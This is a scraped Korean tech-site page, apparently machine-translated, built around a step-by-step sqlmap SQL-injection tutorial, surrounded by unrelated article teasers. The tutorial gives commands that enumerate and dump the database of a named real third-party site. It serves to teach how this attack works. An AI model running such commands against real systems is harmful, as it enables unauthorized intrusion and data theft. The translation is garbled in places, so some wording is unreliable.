VPN을 사용하여 저렴한 항공편을 찾는 방법
항공편을 살펴보면 티켓 가격이 꽤 합리적인 것 같습니다. 하지만 다시 확인할 때마다 티켓 가격이 조금씩 올라갑니다. 항공사가 귀하의 관심을 모니터링하고 티켓 가격을 인상하는 것처럼 느껴집니다.
Web6: SQL 주입 - 일부 악용 도구
이 섹션에서는 LuckyTemplates가 SQL 주입을 활용하는 데 사용되는 몇 가지 도구를 소개합니다 .
현재 많은 보안 취약점 검색 도구(SQL 삽입 포함)가 있습니다. 이러한 도구를 사용하면 SQL 주입 취약점을 매우 강력하게 감지하고 악용할 수 있습니다. 일반적으로 사용되는 자동 SQL 주입 취약점 악용 도구는 다음과 같습니다.
- SQLmap
- The Mole (데이터 발굴)
- 하비즈
Netsparker, jSQL 주입, Burp, BBQSQL 등 참조할 수 있는 다른 도구도 있습니다.
다음은 Sqlmap을 사용하여 기본 SQL 주입을 활용하는 데모입니다.
http://sqlmap.org/에서 Sqlmap을 다운로드합니다.
Sqlmap은 Python으로 작성되었으므로 이 도구를 사용하려면 Python을 설치해야 합니다. http://www.python.org/downloads/에서 Python을 다운로드할 수 있습니다.
먼저 대상 웹사이트를 식별해야 합니다. 여기에는 다음 대상이 있습니다: http://zerocoolhf.altervista.org/level1.php?id=1 (이 페이지는 이제 종료되었습니다).
1단계 : cmd를 열고 다음 명령을 입력합니다.
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1”
sqlmap은 대상의 취약점을 감지하고 취약점에 대한 정보를 제공합니다.
2단계 : 대상 웹사이트에 SQL 주입 취약점이 있다고 판단되면 데이터베이스 이름을 찾습니다.
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --dbs
=> 데이터베이스: my_zerocoolhf
3단계 : 데이터베이스 이름을 결정한 후에는 계속해서 데이터베이스에서 테이블 이름을 찾습니다.
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --tables –D my_zerocoolhf
=> 데이터베이스에는 auth와 book이라는 2개의 테이블이 있습니다.
4단계 : 테이블의 열 이름 결정
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --columns –D my_zerocoolhf –T book
=> 도서 테이블의 열(저자, ID, 가격, 제목)을 식별합니다.
5단계 : 테이블에서 데이터를 덤프합니다.
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --dump –D my_zerocoolhf –T book
=> 그래서 우리는 대상 웹사이트의 데이터베이스를 얻었습니다.
위는 SQL 주입 오류를 활용하기 위해 sqlmap을 사용하는 기본 데모입니다. https://github.com/sqlmapproject/sqlmap/wiki/Usage에서 sqlmap 옵션에 대해 자세히 알아보고 활용을 지원할 수 있습니다. SQL 주입 공격.
Undervolt 명령은 CPU 온도를 낮춥니다.
컴퓨터에서 작업을 많이 할수록 CPU(프로세서)의 온도가 더 높아집니다. 특히 게임을 많이 하거나 비디오를 편집하는 동안에는 더욱 그렇습니다. 환기 시스템이 좋지 않거나 칩의 열 페이스트가 마모되면 CPU가 과열될 가능성이 더 높습니다. 그러나 프로세서 온도를 낮추는 데 도움이 되는 "언더볼팅"이라는 프로세스가 있습니다.
Bing Daily 이미지를 Windows 10 배경화면 및 잠금 화면으로 설정하는 방법
Microsoft에서는 Bing 이미지를 무료로 다운로드하여 시스템에서 사용할 수 있습니다. Windows 10에서 Bing Daily 이미지를 배경 화면, 잠금 화면 및 로그인 화면으로 설정하는 방법은 다음과 같습니다.
드라이브에 자물쇠 아이콘이 있는 이유와 이를 제거하는 방법은 무엇입니까?
파일 탐색기의 드라이브에 자물쇠 아이콘이 있는 이유가 궁금하십니까? 다음 문서에서는 해당 아이콘이 무엇인지, 그리고 Windows 10의 드라이브에서 잠금 아이콘을 제거하는 방법에 대해 설명합니다.
Windows 10에서 Windows 터미널 컨텍스트 메뉴에서 열기를 추가/제거하는 방법
Windows 터미널을 설치하면 파일 탐색기의 폴더 오른쪽 클릭 메뉴에 Windows 터미널에서 열기 항목이 추가됩니다. 이 옵션이 마음에 들지 않는 경우 상황에 맞는 메뉴에서 해당 옵션을 제거하는 방법은 다음과 같습니다.
Man-in-the-Disk 공격이란 무엇입니까?
이 취약점을 통해 침입자는 Android 기기의 합법적인 애플리케이션을 제어하고 이를 사용하여 악성 애플리케이션을 도입할 수 있습니다.
Windows 10에서 로그인 화면 배경 흐림을 비활성화하는 방법
2019년 5월 Windows 10 업데이트부터 로그인 화면이 흐릿한 Fluent Design 발열을 사용합니다. 선명한 잠금 화면 배경화면을 원할 경우 배경 흐림을 비활성화하는 방법은 다음과 같습니다.
공용 WiFi를 사용할 때 절대 해서는 안 되는 9가지 행동
공용 WiFi를 사용할 때 안전을 유지하는 가장 좋은 방법은 해커가 원하는 것을 제공할 수 있는 작업을 피하는 것입니다.
Windows 10 화면에 다크 모드 인터페이스를 설치하는 방법
다크 모드는 Windows 10의 어두운 배경 인터페이스로, 컴퓨터의 배터리 전원을 절약하고 사용자의 눈에 미치는 영향을 줄이는 데 도움이 됩니다.
온라인으로 청구서를 지불할 때 어떤 보안 조치를 사용해야 합니까?
온라인으로 청구서를 지불하는 것은 서비스 제공자에 대한 의무를 준수하는 편리한 방법입니다. 그러나 이 옵션에는 일부 결제 보안 위험이 따릅니다.